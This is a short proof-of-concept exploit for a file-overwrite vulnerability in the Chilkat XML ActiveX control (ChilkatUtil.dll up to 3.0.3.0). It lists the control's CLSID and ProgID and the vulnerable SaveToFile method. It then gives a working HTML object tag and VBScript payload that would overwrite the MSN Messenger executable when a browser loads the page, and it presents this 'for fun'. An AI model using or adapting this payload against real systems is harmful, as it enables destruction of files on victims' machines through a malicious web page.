chilkat-overwrite.txt

`Chilkat XML ActiveX File overwriting vulnerability PoC(on msn.exe) for fun  
  
Discovered by: shinnai  
PoC by: e.wiZz!  
  
In the wild...  
  
  
  
File: ChilkatUtil.dll <= 3.0.3.0  
CLSID: {5022FAE8-B780-4B78-B8DC-1AF1145A4F42}  
ProgID: ChilkatUtil.CkData.1  
Descr.: Chilkat CkData  
  
Vulnerable function SaveToFile()  
  
PoC:  
  
<object classid='clsid:5022FAE8-B780-4B78-B8DC-1AF1145A4F42' id='target' />  
<script language='vbscript'>  
  
'Wscript.echo typename(target)  
  
targetFile = "C:\Program Files\Chilkat Software Inc\Chilkat XML ActiveX\ChilkatUtil.dll"  
prototype = "Function SaveToFile ( ByVal filename As String ) As Long"  
memberName = "SaveToFile"  
progid = "CHILKATUTILLib.CkData"  
argCount = 1  
  
arg1="C:\Program Files\MSN Messenger\msnmsgr.exe"  
  
target.SaveToFile arg1   
  
</script>`